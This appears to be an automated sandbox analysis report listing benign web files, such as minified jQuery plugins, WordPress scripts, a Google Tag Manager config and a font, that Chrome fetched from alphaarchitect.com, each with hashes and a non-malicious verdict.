                                                                                                                                                                                                                                                                        Preview:jQuery(document).ready(function(){jQuery(".fusion-video").each(function(){!jQuery(this).parents(".fusion-modal").length&&1==jQuery(this).data("autoplay")&&jQuery(this).is(":visible")&&jQuery(this).find("iframe").each(function(){jQuery(this).hasClass("lazyload")?jQuery(this).on("lazyloaded",function(){this.contentWindow.location.replace(jQuery(this).attr("data-orig-src").replace("autoplay=0","autoplay=1"))}):jQuery(this).attr("src",jQuery(this).attr("src").replace("autoplay=0","autoplay=1"))})}),jQuery(window).on("resize",function(){var e,i=document.querySelectorAll("iframe"),o=i.length;if(jQuery(".fusion-youtube").each(function(){jQuery(this).is(":visible")||jQuery(this).parents(".fusion-modal").length&&!jQuery(this).parents(".fusion-modal").is(":visible")||jQuery(this).find("iframe").each(function(){this.contentWindow.postMessage('{"event":"command","func":"pauseVideo","args":""}',"*")})}),"undefined"!=typeof Vimeo)for(e=0;e<o;e++)!(void 0!==i[e].src&&-1<i[e].src.toLowerCase().indexOf
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (6100), with no line terminators
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):6100
                                                                                                                                                                                                                                                                        Entropy (8bit):5.18239087347017
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:96:pdSqkXEdsugVqyKuwwSyLrOeCbp7qDqwhSqLqnnG26slpAQ:p0a+ugVbxfprOjAwC1WpAQ
                                                                                                                                                                                                                                                                        MD5:E2D16CDD96D3056B2883422F8C8A5993
                                                                                                                                                                                                                                                                        SHA1:B5160251A1C9AF658C4F05CE30868A0B63639389
                                                                                                                                                                                                                                                                        SHA-256:B44C32B17E2418C99F9B16AE18F11A480ABDCBAE20290842EAD2648272A892A1
                                                                                                                                                                                                                                                                        SHA-512:140A8C894CEEBFE40D95014B71E6565967C6F1D70AF7B10D8371F345BC805575D58C199EFA4FD072B842B5824C769EB47B6688538D2A102ACE8F64D91DB41B7A
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        URL:https://alphaarchitect.com/wp-content/cache/min/1/wp-content/themes/Avada/includes/lib/assets/min/js/library/jquery.sticky-kit.js?ver=1733842125
                                                                                                                                                                                                                                                                        Preview:(function(){var t,i;t=this.jQuery||window.jQuery,i=t(window),t.fn.stick_in_parent=function(s){var o,n,e,r,c,a,f,l,u,g,d,k,h,p,y,v,m,b,_,C;for(null==s&&(s={}),k=s.sticky_class,a=s.inner_scrolling,d=s.recalc_every,g=s.parent,u=s.offset_top,l=s.spacer,e=s.bottoming,h=void 0!==s.transition_offset&&parseFloat(s.transition_offset),p=void 0!==s.observer&&s.observer,y=void 0!==s.scroll_transition&&parseFloat(s.scroll_transition),v=void 0!==s.clone&&s.clone,m=!1,adminBarHeight=fusion.getAdminbarHeight(),null==u&&(u=0),"fusion-container-stuck"===k&&"object"==typeof fusion&&"function"==typeof fusion.getHeight&&(u=fusion.getHeight(u)+adminBarHeight),null==g&&(g=void 0),null==a&&(a=!0),null==k&&(k="is_stuck"),o=t(document),null==e&&(e=!0),r=function(n,r,c,f,w,x,j,H){var z,I,A,O,Q,B,F,M,R,T,D,G,S;if(!n.data("sticky_kit")){if(n.attr("data-sticky_kit",!0),Q=o.height(),F=n.parent(),null!=g&&(F=F.closest(g)),!F.length)throw"failed to find stick parent";if(A=!1,z=!1,null!=l?D=l&&n.closest(l):v?(D=n.clone
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):124
                                                                                                                                                                                                                                                                        Entropy (8bit):4.944184320927833
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:3:Hd1bCfNh30EtbGXIuINrO8K/NcXiCnS6bRxVEkxoQ:TcNN9tnrObFcyuSERIkP
                                                                                                                                                                                                                                                                        MD5:89C91C3E75837D6D6B72002486EDCC69
                                                                                                                                                                                                                                                                        SHA1:7EF89BE83DB1845827DA5C75368924E94EEF37FC
                                                                                                                                                                                                                                                                        SHA-256:5D5042582FBF7142CF984A49AA24E60AFD3C4433324FC33BC0A3957D07BA8BFE
                                                                                                                                                                                                                                                                        SHA-512:8F3B06D487DD7C0E04F29C5CC5A1261769C1FA5C9DA8185A5C2764890CE45031EE9E25C6EC900CA6117CDF25198AF0B32C0CA9884B936E0D7A62405883A1C6F1
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISEAmKLw3m1pTm9RIFDRM0Cs4SFwkb5UK11j0uMhIFDSbzfSsSBQ35ig9oEhcJH8kP1U8aNKASBQ0m830rEgUN-YoPaBIXCWKqcYPJIHZyEgUNJvN9KxIFDfmKD2gSFwkKdGcZPzynexIFDYOoWz0SBQ0byJlN?alt=proto
                                                                                                                                                                                                                                                                        Preview:CgkKBw0TNArOGgAKEgoHDSbzfSsaAAoHDfmKD2gaAAoSCgcNJvN9KxoACgcN+YoPaBoAChIKBw0m830rGgAKBw35ig9oGgAKEgoHDYOoWz0aAAoHDRvImU0aAA==
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (2282), with no line terminators
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):2282
                                                                                                                                                                                                                                                                        Entropy (8bit):5.066335914621365
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:48:HSHQZqYWKR3hA7CGA9AhkG4GbeEzUGrUIzrU5mQyYRYxjYcFinFUxdXYyOYMMY3i:HuYtUi27zKCcfusqM1e2i
                                                                                                                                                                                                                                                                        MD5:A3AC1E89E0CD755B8FB471A772CFED82
                                                                                                                                                                                                                                                                        SHA1:8DA1263AB74F7C24C47704B68B926140DD1292FE
                                                                                                                                                                                                                                                                        SHA-256:9F2D06D1E827A9C7440CAC92D2677A36A9D798FA4BB0F1E01E6F7DC5E6204741
                                                                                                                                                                                                                                                                        SHA-512:549F30F46973194317164EDBC5BB729614870CD435AA58DD266EFE3CCA06B51177A9B3C74F295A29B97713A8962BC40A9B526930FE26426722B05E3137CCE034
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        URL:https://alphaarchitect.com/wp-content/cache/min/1/wp-content/themes/Avada/includes/lib/assets/min/js/library/jquery.easing.js?ver=1733842125
                                                                                                                                                                                                                                                                        Preview:!function(n){"function"==typeof define&&define.amd?define(["jquery"],function(e){return n(e)}):"object"==typeof module&&"object"==typeof module.exports?exports=n(require("jquery")):n(jQuery)}(function(n){n.easing.jswing=n.easing.swing;var e=Math.pow,t=Math.sqrt,u=Math.sin,r=Math.cos,i=Math.PI,a=1.70158,c=1.525*a,o=2*i/3,s=2*i/4.5;function f(n){var e=7.5625,t=2.75;return n<1/t?e*n*n:n<2/t?e*(n-=1.5/t)*n+.75:n<2.5/t?e*(n-=2.25/t)*n+.9375:e*(n-=2.625/t)*n+.984375}n.extend(n.easing,{def:"easeOutQuad",swing:function(e){return n.easing[n.easing.def](e)},easeInQuad:function(n){return n*n},easeOutQuad:function(n){return 1-(1-n)*(1-n)},easeInOutQuad:function(n){return n<.5?2*n*n:1-e(-2*n+2,2)/2},easeInCubic:function(n){return n*n*n},easeOutCubic:function(n){return 1-e(1-n,3)},easeInOutCubic:function(n){return n<.5?4*n*n*n:1-e(-2*n+2,3)/2},easeInQuart:function(n){return n*n*n*n},easeOutQuart:function(n){return 1-e(1-n,4)},easeInOutQuart:function(n){return n<.5?8*n*n*n*n:1-e(-2*n+2,4)/2},easeInQu
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (5910), with no line terminators
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):5910
                                                                                                                                                                                                                                                                        Entropy (8bit):5.1110879069805835
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:96:CWM5xkc/fB7djdZyT9uHSc5uQ4w2sGC6A34gzjG3GAGG/GC:Cj5xVdf+c5Hl6AfHAuC
                                                                                                                                                                                                                                                                        MD5:8000D40207FAC2BA06A65DF8DA0F280A
                                                                                                                                                                                                                                                                        SHA1:9FA36112B02A1E35E70AA1D2EB49442D0AD54AE9
                                                                                                                                                                                                                                                                        SHA-256:B8F4A22F58424ADC766B511DB3293B2721793A380FCF4CB19E56C5D7ADB7B40B
                                                                                                                                                                                                                                                                        SHA-512:0B3084247CD5A42CE06EF1F3B1D0C92B3E9D63F9292C68E0F99269D96202AB0A97521F78B7A3FC486D2758C1B1C7360396CA189E82D79FECF4BD7DA9A22E6261
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        URL:https://alphaarchitect.com/wp-content/cache/min/1/wp-content/plugins/fusion-builder/assets/js/min/library/jquery.textillate.js?ver=1733842125
                                                                                                                                                                                                                                                                        Preview:!function(t){function e(e,n,i,s){var a=e.text().split(n),l="";a.length&&(t(a).each(function(t,e){l+='<span class="'+i+(t+1)+'">'+e+"</span>"+s}),e.empty().append(l))}var n={init:function(){return this.each(function(){e(t(this),"","char","")})},words:function(){return this.each(function(){e(t(this)," ","word"," ")})},lines:function(){return this.each(function(){var n="eefec303079ad17405c889e092e105b0";e(t(this).children("br").replaceWith(n).end(),n,"line","")})}};t.fn.lettering=function(e){return e&&n[e]?n[e].apply(this,[].slice.call(arguments,1)):"letters"!==e&&e?(t.error("Method "+e+" does not exist on jQuery.lettering"),this):n.init.apply(this,[].slice.call(arguments,0))}}(jQuery),function(t){"use strict";function e(e){return/In/.test(e)||t.inArray(e,t.fn.textillate.defaults.inEffects)>=0}function n(e){return/Out/.test(e)||t.inArray(e,t.fn.textillate.defaults.outEffects)>=0}function i(t){return"true"!==t&&"false"!==t?t:"true"===t}function s(e){var n=e.attributes||[],s={};return n.len
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 51404, version 1.0
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):51404
                                                                                                                                                                                                                                                                        Entropy (8bit):7.99617623263121
                                                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                                                        SSDEEP:1536:XTzL/0fgje1XjYiNNbrcKyh9wlww93XuhSVI:XHL/0fgje1TfcKBHi
                                                                                                                                                                                                                                                                        MD5:B904FCDF1C4C6059FADD6893A7BC7619
                                                                                                                                                                                                                                                                        SHA1:F41D1674F02616F03EF77D4E84B3AD8BA28A36FC
                                                                                                                                                                                                                                                                        SHA-256:517EDD119C5B2719E6AC4B30BF1FD864A6395179A41D273C0AFC0696E7495D8E
                                                                                                                                                                                                                                                                        SHA-512:1D86E3C2E83265DB1E9B244B749DCE0BF39944302CA01FF3123AA5F1CF2CF562774BA344B9D4B2C65DA33126AB0A5D80E37D448A794DCE7F9F797F9544938503
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        URL:https://fonts.gstatic.com/s/robotocondensed/v27/ieVl2ZhZI2eCN5jzbjEETS9weq8-19K7DQ.woff2
                                                                                                                                                                                                                                                                        Preview:wOF2...................Q..........................".....t?HVAR.v.`?STAT.N'...J..~.../~.....0.....Z.0..R.6.$..0. .... ..N[U}qC.....WQ.!..M.T..e.X.......X......S...\.....t...\...:..._.0w.`xq....l.....([VlY..2=..Fx... h..NQ..M.(Y..@x..L$;..:...6....S.cx..Q......... >".......6n^....%...".C...v...]..0....M|.GPR1.6..S...2oN..`...k-).... MV./3....n.......=^}...`'.$.Qs.U.j....q.P~.X..}..9...F.!..O..J5....-...`d.'............C. .(.Aj.......UR.|..S3*....r.....H76..#2......J.d|:.g.6.(.,,.rT.(...VU.(...d.......Zvr.8...Z.%u.....T....F4.[..... ..s.L..cN.;Wb..:X.... n...)v..| ...s..b`...5...V.0..hG....}........_w\..yU...O..t.!.....v....;..&...............v.].v.... .!xH.@.....?..I..".....b9.I.BA...".R(...~.6.t.?\.#..! ....6R.FF.OQ.....#i<..;...#..o.p$o....<. .>j...A..Y..!....l..$.e[F.!v......&......p........4d.....|....)..@.}...J.O...HFAA.\.g7........-.".......0q..${/..C.`).uwIhq!l...X...d.f.R..+Miv..ws^....&....... .K.....V.DC..UP...7......G.p...-.P..H....v..
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (18843)
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):18878
                                                                                                                                                                                                                                                                        Entropy (8bit):5.200208004249851
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:384:u2Rq5yjN1V02mEHrJDzWp3D0bMpOt3PPD71ijeE9OWj:LqIbV0sHG3D0dD71Uj
                                                                                                                                                                                                                                                                        MD5:16699A7F2AEBE8D676042962C3BB5537
                                                                                                                                                                                                                                                                        SHA1:9697E3FE2D92C79DEBD82478603D4B59FC249714
                                                                                                                                                                                                                                                                        SHA-256:5152316FADE8C592FBFD38BC491E059464D967D3D31A582B0C885C0961DEED30
                                                                                                                                                                                                                                                                        SHA-512:49AE27B783F99B50A7FE43F084554EDBC87E430982C736C425FDFC26D1550C19B28C6127D3C8A730A31317ADF90008CFE5DBDDD27ECC6E1096D5520704ED8621
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        Preview:/*! This file is auto-generated */.!function(n,t){var r,e;"object"==typeof exports&&"undefined"!=typeof module?module.exports=t():"function"==typeof define&&define.amd?define("underscore",t):(n="undefined"!=typeof globalThis?globalThis:n||self,r=n._,(e=n._=t()).noConflict=function(){return n._=r,e})}(this,function(){var n="1.13.7",t="object"==typeof self&&self.self===self&&self||"object"==typeof global&&global.global===global&&global||Function("return this")()||{},e=Array.prototype,V=Object.prototype,F="undefined"!=typeof Symbol?Symbol.prototype:null,P=e.push,f=e.slice,s=V.toString,q=V.hasOwnProperty,r="undefined"!=typeof ArrayBuffer,u="undefined"!=typeof DataView,U=Array.isArray,W=Object.keys,z=Object.create,L=r&&ArrayBuffer.isView,$=isNaN,C=isFinite,K=!{toString:null}.propertyIsEnumerable("toString"),J=["valueOf","isPrototypeOf","toString","propertyIsEnumerable","hasOwnProperty","toLocaleString"],G=Math.pow(2,53)-1;function l(u,o){return o=null==o?u.length-1:+o,function(){for(var n=M
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (1391)
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1426
                                                                                                                                                                                                                                                                        Entropy (8bit):5.2713128211306
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24:Q77Beacy8766a2IFav3gRR46UUU6DXEhL38AX34jPrgwXopq17hgn:Q7DHH2IuggP6DXEF36oo8
                                                                                                                                                                                                                                                                        MD5:19D386C9004E54941C1CC61D357EFA5D
                                                                                                                                                                                                                                                                        SHA1:0A77594006C8D86FDCC0ADBC2B9AECAEF3869586
                                                                                                                                                                                                                                                                        SHA-256:3BC6467A95CEC8FA516C6F5F69E1301E37E16F9BB1046FE7756729249F901B95
                                                                                                                                                                                                                                                                        SHA-512:7811CF6BABB4DF41707F97D1BD65337B5AD7AAEDFF301FCEDB90FB7773FA9876F52458AA03A576910F6126384599EF25F8DE76EE309C22E1914D9CF444AEFB6F
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        Preview:/*! This file is auto-generated */.window.wp=window.wp||{},function(s){var t="undefined"==typeof _wpUtilSettings?{}:_wpUtilSettings;wp.template=_.memoize(function(e){var n,a={evaluate:/<#([\s\S]+?)#>/g,interpolate:/\{\{\{([\s\S]+?)\}\}\}/g,escape:/\{\{([^\}]+?)\}\}(?!\})/g,variable:"data"};return function(t){if(document.getElementById("tmpl-"+e))return(n=n||_.template(s("#tmpl-"+e).html(),a))(t);throw new Error("Template not found: #tmpl-"+e)}}),wp.ajax={settings:t.ajax||{},post:function(t,e){return wp.ajax.send({data:_.isObject(t)?t:_.extend(e||{},{action:t})})},send:function(a,t){var e,n;return _.isObject(a)?t=a:(t=t||{}).data=_.extend(t.data||{},{action:a}),t=_.defaults(t||{},{type:"POST",url:wp.ajax.settings.url,context:this}),(e=(n=s.Deferred(function(n){t.success&&n.done(t.success),t.error&&n.fail(t.error),delete t.success,delete t.error,n.jqXHR=s.ajax(t).done(function(t){var e;"1"!==t&&1!==t||(t={success:!0}),_.isObject(t)&&!_.isUndefined(t.success)?(e=this,n.done(function(){a&&
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):395
                                                                                                                                                                                                                                                                        Entropy (8bit):5.484241622671332
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:12:zAMoIEFjelzFDfVCiul7foJPQ7YKR4v/CMwK1eJ:zAMoIEFqzzu5fUYY/wK1eJ
                                                                                                                                                                                                                                                                        MD5:D15D631AAE56C61F822351F352725AEF
                                                                                                                                                                                                                                                                        SHA1:BFAFDB6ADFD6ABC0682802EA3555283D36ED8CAB
                                                                                                                                                                                                                                                                        SHA-256:C14977050174E109AF9D3A1518823F590FB653267F5F83AAA839E9B4D338B3EA
                                                                                                                                                                                                                                                                        SHA-512:D1E4DFBBFC5AE2E850C6D9DA79B83B3B0644F88E978EDDD061EF56F7CF775064145ABE8A3BE7589BDA4F275B6F77B0D2E74FE6C8472E25D0B248435C1EF8136E
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        Preview:jQuery(document).ready(function($){var testImg='data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIyNzUiIGhlaWdodD0iMjc1Ij48L3N2Zz4%3D';var img=document.createElement('img').img.setAttribute('src',testImg);img.addEventListener('load',function(){$('img.quicklatex-auto-format').attr('src',function(){return $(this).attr('src').replace('.png','.svg')})},!0)})
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:HTML document, ASCII text, with very long lines (1766), with no line terminators
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):1766
                                                                                                                                                                                                                                                                        Entropy (8bit):5.1952196560976756
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:48:9ZZodJw/9O8K+spEluF+gErvj6H90iYTT7g38sgE+4g5SX:9Zed+1GFfd0iQ28TLIX
                                                                                                                                                                                                                                                                        MD5:75FF45922D4CFC4E09596AE9FE26E148
                                                                                                                                                                                                                                                                        SHA1:14FC6E7E672A51482D64ED6B50FE2CE608CA411E
                                                                                                                                                                                                                                                                        SHA-256:386E04B63DA7CBEF05D443BB358C61065B7F4B2B8B000BA826E05C80AC916268
                                                                                                                                                                                                                                                                        SHA-512:DD69F2240F6D6BB4D5ED2C162F6D738AB5D39982B056CAA7405AF74E163191E7759840E6D43B1322214924204F12D0013FB80B92C754241C6465173C37D6C925
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        URL:https://alphaarchitect.com/wp-content/cache/min/1/wp-content/themes/Avada/includes/lib/assets/min/js/library/jquery.fitvids.js?ver=1733842125
                                                                                                                                                                                                                                                                        Preview:!function(t){"use strict";t.fn.fitVids=function(e){var i={customSelector:null,ignore:null};if(!document.getElementById("fit-vids-style")){var r=document.head||document.getElementsByTagName("head")[0],a=document.createElement("div");a.innerHTML='<p>x</p><style id="fit-vids-style">.fluid-width-video-wrapper{width:100%;position:relative;padding:0;}.fluid-width-video-wrapper iframe,.fluid-width-video-wrapper object,.fluid-width-video-wrapper embed {position:absolute;top:0;left:0;width:100%;height:100%;}</style>',r.appendChild(a.childNodes[1])}return e&&t.extend(i,e),this.each(function(){var e=['iframe[src*="player.vimeo.com"]','iframe[src*="youtube.com"]','iframe[src*="youtube-nocookie.com"]','iframe[src*="kickstarter.com"][src*="video.html"]',"object","embed"];i.customSelector&&e.push(i.customSelector);var r=".fitvidsignore";i.ignore&&(r=r+", "+i.ignore);var a=t(this).find(e.join(","));(a=(a=a.not("object object")).not(r)).each(function(){var e=t(this);if(!(e.parents(r).length>0||"embed"=
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (15973)
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):421916
                                                                                                                                                                                                                                                                        Entropy (8bit):5.644921112795949
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:6144:t47AlnYnsmQ8HtZ1HcRCrZHe5NAoEZMf3/Nxfq+uT+bo3Y:m7ULm9Ht7Hc81e5azwYY
                                                                                                                                                                                                                                                                        MD5:85EF3482FBE87F0901B3AC75F1C690F3
                                                                                                                                                                                                                                                                        SHA1:6CB37721A0928385CE8062E0DB32C8372FA53941
                                                                                                                                                                                                                                                                        SHA-256:7751BD443623A34688B35422D83524B85E51BCE36BEF3B76E780FB22841AAAB9
                                                                                                                                                                                                                                                                        SHA-512:142A2C80896543F9CDAC43D7A6A6F78318324D3A57B495241ACBA2AF5B29DF26F5B64C2E75C9BB3E908FF9510729C79BB1DC62CE00E142579A6C7CFFCC7EEE71
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"2",. . "macros":[{"function":"__e"},{"function":"__c","vtp_value":""},{"function":"__c","vtp_value":0}],. "tags":[{"function":"__ogt_ga_send","priority":16,"vtp_value":true,"tag_id":107},{"function":"__ogt_referral_exclusion","priority":16,"vtp_includeConditions":["list","alphaarchitect\\.com"],"tag_id":109},{"function":"__ogt_session_timeout","priority":16,"vtp_sessionMinutes":30,"vtp_sessionHours":0,"tag_id":110},{"function":"__ogt_1p_data_v2","priority":16,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_cityType":"CSS_SELECTOR","vtp_manualEmailEnabled":false,"vtp_firstNameType":"CSS_SELECTOR","vtp_countryType":"CSS_SELECTOR","vtp_cityValue":"","vtp_emailType":"CSS_SELECTOR","vtp_regionType":"CSS_SELECTOR","vtp_autoEmailEnabled":true,"vtp_postalCodeValue":"","vtp_lastNameValue":"","vtp_phoneType":
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (2624), with no line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):2624
                                                                                                                                                                                                                                                                        Entropy (8bit):5.212942675151984
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:48:6SHLaiwohotYSEykh8OXlSUdhl/Rle1lSPyWRWsCiGHMZWDIWssgfN6bPJ0:6dbYSEiTKaW+iGyWkXAq
                                                                                                                                                                                                                                                                        MD5:DB980CFEFCDE15CC27BD5FCD7B54AD84
                                                                                                                                                                                                                                                                        SHA1:D1F351509F26417BF2F11F5B63ADA386858D8280
                                                                                                                                                                                                                                                                        SHA-256:2F023BF26161BE90912693ACDD0F79A7DF85F417574917F775F7E4CC41B1D928
                                                                                                                                                                                                                                                                        SHA-512:DC36251264E22B37A8E48CA4D5FAC5481437DC52CDCA204BAB1DED672C8BAA411643492C12508A683E3D41701AEF9B9F9A1ED79C8126101E85674CD572B3BBC6
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        Preview:!function(e){"function"==typeof define&&define.amd?define(["jquery"],e):"object"==typeof exports?module.exports=e:e(jQuery)}(function(e){var t,i,n=["wheel","mousewheel","DOMMouseScroll","MozMousePixelScroll"],o="onwheel"in document||document.documentMode>=9?["wheel"]:["mousewheel","DomMouseScroll","MozMousePixelScroll"],l=Array.prototype.slice;if(e.event.fixHooks)for(var s=n.length;s;)e.event.fixHooks[n[--s]]=e.event.mouseHooks;var a=e.event.special.mousewheel={version:"3.1.12",setup:function(){if(this.addEventListener)for(var t=o.length;t;)this.addEventListener(o[--t],h,{passive:!0,capture:!1});else this.onmousewheel=h;e.data(this,"mousewheel-line-height",a.getLineHeight(this)),e.data(this,"mousewheel-page-height",a.getPageHeight(this))},teardown:function(){if(this.removeEventListener)for(var t=o.length;t;)this.removeEventListener(o[--t],h,!1);else this.onmousewheel=null;e.removeData(this,"mousewheel-line-height"),e.removeData(this,"mousewheel-page-height")},getLineHeight:function(t){
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (388), with no line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):388
                                                                                                                                                                                                                                                                        Entropy (8bit):4.746612465219723
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:6:z8Hp9G1sYTyRlaRgavuZZdMTzubYAAhERhTbYu1dGSbYAAhmM/fSBc:zAMmDaRgaGZZdMTzucERNcIGScmMoc
                                                                                                                                                                                                                                                                        MD5:7895A83A2E3717B4937CBEF999833AE0
                                                                                                                                                                                                                                                                        SHA1:EC9BDDB891515F20D705DD3276CAC39EE587AEDE
                                                                                                                                                                                                                                                                        SHA-256:3156AC3F8B5C61BF0E9DF9E452563B35CDB5FE9F0ABBDA56D672728FC7119540
                                                                                                                                                                                                                                                                        SHA-512:674B9AF4DB0E4312FA40A190D4C3C5045F9637711338F6FDEFB54E045F5B73BD00965D2650514681C7D54A60F5F54CE5C73F31969582D4C83F1C3E96C0CB655C
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        Preview:jQuery(document).on("click","a.um-toggle-gdpr",function(e){var e=jQuery(e.currentTarget),t=e.closest(".um-field-area"),g=t.find(".um-gdpr-content");g.is(":visible")?(t.find("a.um-toggle-gdpr").text(e.data("toggle-show")),g.hide().find("a.um-toggle-gdpr").remove(),e.length&&e.get(0).scrollIntoView()):(t.find("a.um-toggle-gdpr").text(e.data("toggle-hide")),g.show().prepend(e.clone()))});
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (1710), with no line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1710
                                                                                                                                                                                                                                                                        Entropy (8bit):5.187292993389159
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:48:SAoBZBLCGSlTwWOMZBRa7XJO+4ZHJTAXNsVaz:VKclTwyTRa73SpsQK
                                                                                                                                                                                                                                                                        MD5:C8D9525DF52DEA5D6DA2BB515F8DE58C
                                                                                                                                                                                                                                                                        SHA1:3EF8140E5CA31875DCECAFD10D26DDF04087A979
                                                                                                                                                                                                                                                                        SHA-256:BBC5D9991155EA9E229015FB342D9E619BA1685544577FB6645A16EF0D31DBDF
                                                                                                                                                                                                                                                                        SHA-512:56AF47A6142F678484474B8B83030FDE3DA6E23B3EB399017874FA86C908DB85B9C79364ADC8CFA850A308C60CD0A5B093594B564099224D2D4953CF02BD335E
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
